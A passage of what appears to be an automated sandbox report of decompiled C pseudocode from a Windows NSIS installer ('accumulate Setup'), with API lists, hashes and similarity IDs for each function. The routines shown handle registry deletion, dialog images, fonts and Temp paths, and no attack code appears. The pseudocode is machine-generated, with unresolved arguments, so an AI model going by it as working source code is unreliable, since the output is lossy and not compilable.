                                                          				signed int _t45;
                                                          				signed int _t46;
                                                          				signed int _t47;
                                                          
                                                          				_t46 = _a12;
                                                          				_t47 = _t46 & 0x00000300;
                                                          				_t45 = _t46 & 0x00000001;
                                                          				_t27 = E00405F7D(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                          				if(_t27 == 0) {
                                                          					if((_a12 & 0x00000002) == 0) {
                                                          						L3:
                                                          						_push(0x105);
                                                          						_push( &_v276);
                                                          						_push(0);
                                                          						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                          							__eflags = _t45;
                                                          							if(__eflags != 0) {
                                                          								L10:
                                                          								RegCloseKey(_v8);
                                                          								return 0x3eb;
                                                          							}
                                                          							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
                                                          							__eflags = _t33;
                                                          							if(_t33 != 0) {
                                                          								break;
                                                          							}
                                                          							_push(0x105);
                                                          							_push( &_v276);
                                                          							_push(_t45);
                                                          						}
                                                          						RegCloseKey(_v8);
                                                          						_t35 = E00406500(3);
                                                          						if(_t35 != 0) {
                                                          							return  *_t35(_a4, _a8, _t47, 0);
                                                          						}
                                                          						return RegDeleteKeyA(_a4, _a8);
                                                          					}
                                                          					_v12 = 0;
                                                          					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                          						goto L10;
                                                          					}
                                                          					goto L3;
                                                          				}
                                                          				return _t27;
                                                          			}












                                                          APIs
                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:
                                                          • API String ID: 1354259210-0
                                                          • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                          • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                          • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                          • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E00401D65(void* __ebx, void* __edx) {
                                                          				struct HWND__* _t30;
                                                          				CHAR* _t38;
                                                          				void* _t48;
                                                          				void* _t53;
                                                          				signed int _t55;
                                                          				signed int _t58;
                                                          				long _t61;
                                                          				void* _t65;
                                                          
                                                          				_t53 = __ebx;
                                                          				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                          					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                          				} else {
                                                          					E00402BAC(2);
                                                          					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                          				}
                                                          				_t55 =  *(_t65 - 0x1c);
                                                          				 *(_t65 + 8) = _t30;
                                                          				_t58 = _t55 & 0x00000004;
                                                          				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                          				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                          				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                          				if((_t55 & 0x00010000) == 0) {
                                                          					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                          				} else {
                                                          					_t38 = E00402BCE(0x11);
                                                          				}
                                                          				 *(_t65 - 8) = _t38;
                                                          				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                          				asm("sbb edi, edi");
                                                          				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                          				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                          				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                          					DeleteObject(_t48);
                                                          				}
                                                          				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                          					_push(_t61);
                                                          					E00406055();
                                                          				}
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t65 - 4));
                                                          				return 0;
                                                          			}












                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                          • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                          • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                          • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E00401E35(intOrPtr __edx) {
                                                          				void* __esi;
                                                          				int _t9;
                                                          				signed char _t15;
                                                          				struct HFONT__* _t18;
                                                          				intOrPtr _t30;
                                                          				struct HDC__* _t31;
                                                          				void* _t33;
                                                          				void* _t35;
                                                          
                                                          				_t30 = __edx;
                                                          				_t31 = GetDC( *(_t35 - 8));
                                                          				_t9 = E00402BAC(2);
                                                          				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                          				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                          				ReleaseDC( *(_t35 - 8), _t31);
                                                          				 *0x40b848 = E00402BAC(3);
                                                          				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                          				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                          				 *0x40b84f = 1;
                                                          				 *0x40b84c = _t15 & 0x00000001;
                                                          				 *0x40b84d = _t15 & 0x00000002;
                                                          				 *0x40b84e = _t15 & 0x00000004;
                                                          				E0040618A(_t9, _t31, _t33, 0x40b854,  *((intOrPtr*)(_t35 - 0x24)));
                                                          				_t18 = CreateFontIndirectA(0x40b838);
                                                          				_push(_t18);
                                                          				_push(_t33);
                                                          				E00406055();
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
                                                          				return 0;
                                                          			}












                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E38
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                          • ReleaseDC.USER32 ref: 00401E6B
                                                          • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                                                          • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                          • Opcode Fuzzy Hash: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                                                          • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 59%
                                                          			E00401C2E(intOrPtr __edx) {
                                                          				int _t29;
                                                          				long _t30;
                                                          				signed int _t32;
                                                          				CHAR* _t35;
                                                          				long _t36;
                                                          				int _t41;
                                                          				signed int _t42;
                                                          				int _t46;
                                                          				int _t56;
                                                          				intOrPtr _t57;
                                                          				struct HWND__* _t61;
                                                          				void* _t64;
                                                          
                                                          				_t57 = __edx;
                                                          				_t29 = E00402BAC(3);
                                                          				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                          				 *(_t64 - 8) = _t29;
                                                          				_t30 = E00402BAC(4);
                                                          				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                          				 *(_t64 + 8) = _t30;
                                                          				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                          					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
                                                          				}
                                                          				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                          				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                          					 *(_t64 + 8) = E00402BCE(0x44);
                                                          				}
                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                          				_push(1);
                                                          				if(__eflags != 0) {
                                                          					_t59 = E00402BCE();
                                                          					_t32 = E00402BCE();
                                                          					asm("sbb ecx, ecx");
                                                          					asm("sbb eax, eax");
                                                          					_t35 =  ~( *_t31) & _t59;
                                                          					__eflags = _t35;
                                                          					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                          					goto L10;
                                                          				} else {
                                                          					_t61 = E00402BAC();
                                                          					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                          					_t41 = E00402BAC(2);
                                                          					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                          					_t56 =  *(_t64 - 0x14) >> 2;
                                                          					if(__eflags == 0) {
                                                          						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                          						L10:
                                                          						 *(_t64 - 0xc) = _t36;
                                                          					} else {
                                                          						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                          						asm("sbb eax, eax");
                                                          						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                          					}
                                                          				}
                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                          				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                          					_push( *(_t64 - 0xc));
                                                          					E00406055();
                                                          				}
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
                                                          				return 0;
                                                          			}
















                                                          APIs
                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                          • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                          • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                          • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E004049C4(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                          				char _v36;
                                                          				char _v68;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t21;
                                                          				signed int _t22;
                                                          				void* _t29;
                                                          				void* _t31;
                                                          				void* _t32;
                                                          				void* _t41;
                                                          				signed int _t43;
                                                          				signed int _t47;
                                                          				signed int _t50;
                                                          				signed int _t51;
                                                          				signed int _t53;
                                                          
                                                          				_t21 = _a16;
                                                          				_t51 = _a12;
                                                          				_t41 = 0xffffffdc;
                                                          				if(_t21 == 0) {
                                                          					_push(0x14);
                                                          					_pop(0);
                                                          					_t22 = _t51;
                                                          					if(_t51 < 0x100000) {
                                                          						_push(0xa);
                                                          						_pop(0);
                                                          						_t41 = 0xffffffdd;
                                                          					}
                                                          					if(_t51 < 0x400) {
                                                          						_t41 = 0xffffffde;
                                                          					}
                                                          					if(_t51 < 0xffff3333) {
                                                          						_t50 = 0x14;
                                                          						asm("cdq");
                                                          						_t22 = 1 / _t50 + _t51;
                                                          					}
                                                          					_t23 = _t22 & 0x00ffffff;
                                                          					_t53 = _t22 >> 0;
                                                          					_t43 = 0xa;
                                                          					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                          				} else {
                                                          					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                          					_t47 = 0;
                                                          				}
                                                          				_t29 = E0040618A(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                          				_t31 = E0040618A(_t41, _t47, _t53,  &_v68, _t41);
                                                          				_t32 = E0040618A(_t41, _t47, 0x42a890, 0x42a890, _a8);
                                                          				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                          				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
                                                          			}




















                                                          APIs
                                                          • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                          • wsprintfA.USER32 ref: 00404A6A
                                                          • SetDlgItemTextA.USER32 ref: 00404A7D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                                                          • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                          • Opcode Fuzzy Hash: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                                                          • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405A8F(CHAR* _a4) {
                                                          				CHAR* _t7;
                                                          
                                                          				_t7 = _a4;
                                                          				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                          					lstrcatA(_t7, 0x40a014);
                                                          				}
                                                          				return _t7;
                                                          			}





                                                          APIs
                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3916508600
                                                          • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                          • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                          • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                          • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00402E3D(intOrPtr _a4) {
                                                          				long _t2;
                                                          				struct HWND__* _t3;
                                                          				struct HWND__* _t6;
                                                          
                                                          				if(_a4 == 0) {
                                                          					if( *0x429448 == 0) {
                                                          						_t2 = GetTickCount();
                                                          						if(_t2 >  *0x42f430) {
                                                          							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402DBA, 0);
                                                          							 *0x429448 = _t3;
                                                          							return ShowWindow(_t3, 5);
                                                          						}
                                                          						return _t2;
                                                          					} else {
                                                          						return E0040653C(0);
                                                          					}
                                                          				} else {
                                                          					_t6 =  *0x429448;
                                                          					if(_t6 != 0) {
                                                          						_t6 = DestroyWindow(_t6);
                                                          					}
                                                          					 *0x429448 = 0;
                                                          					return _t6;
                                                          				}
                                                          			}







                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
                                                          • GetTickCount.KERNEL32 ref: 00402E6E
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                          • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                          • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                          • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E00405B7D(void* __eflags, intOrPtr _a4) {
                                                          				int _t11;
                                                          				signed char* _t12;
                                                          				intOrPtr _t18;
                                                          				intOrPtr* _t21;
                                                          				void* _t22;
                                                          
                                                          				E004060F7(0x42bc98, _a4);
                                                          				_t21 = E00405B28(0x42bc98);
                                                          				if(_t21 != 0) {
                                                          					E004063D2(_t21);
                                                          					if(( *0x42f43c & 0x00000080) == 0) {
                                                          						L5:
                                                          						_t22 = _t21 - 0x42bc98;
                                                          						while(1) {
                                                          							_t11 = lstrlenA(0x42bc98);
                                                          							_push(0x42bc98);
                                                          							if(_t11 <= _t22) {
                                                          								break;
                                                          							}
                                                          							_t12 = E0040646B();
                                                          							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                          								E00405AD6(0x42bc98);
                                                          								continue;
                                                          							} else {
                                                          								goto L1;
                                                          							}
                                                          						}
                                                          						E00405A8F();
                                                          						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                                          					}
                                                          					_t18 =  *_t21;
                                                          					if(_t18 == 0 || _t18 == 0x5c) {
                                                          						goto L1;
                                                          					} else {
                                                          						goto L5;
                                                          					}
                                                          				}
                                                          				L1:
                                                          				return 0;
                                                          			}









                                                          APIs
                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,accumulate Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                          • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                          • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 3248276644-3916508600
                                                          • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                          • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                          • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                          • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 89%
                                                          			E00405192(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                          				int _t15;
                                                          				long _t16;
                                                          
                                                          				_t15 = _a8;
                                                          				if(_t15 != 0x102) {
                                                          					if(_t15 != 0x200) {
                                                          						_t16 = _a16;
                                                          						L7:
                                                          						if(_t15 == 0x419 &&  *0x42a87c != _t16) {
                                                          							_push(_t16);
                                                          							_push(6);
                                                          							 *0x42a87c = _t16;
                                                          							E00404B4E();
                                                          						}
                                                          						L11:
                                                          						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
                                                          					}
                                                          					if(IsWindowVisible(_a4) == 0) {
                                                          						L10:
                                                          						_t16 = _a16;
                                                          						goto L11;
                                                          					}
                                                          					_t16 = E00404ACE(_a4, 1);
                                                          					_t15 = 0x419;
                                                          					goto L7;
                                                          				}
                                                          				if(_a12 != 0x20) {
                                                          					goto L10;
                                                          				}
                                                          				E004041C7(0x413);
                                                          				return 0;
                                                          			}






                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 004051C1
                                                          • CallWindowProcA.USER32 ref: 00405212
                                                            • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                          • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                          • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                          • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
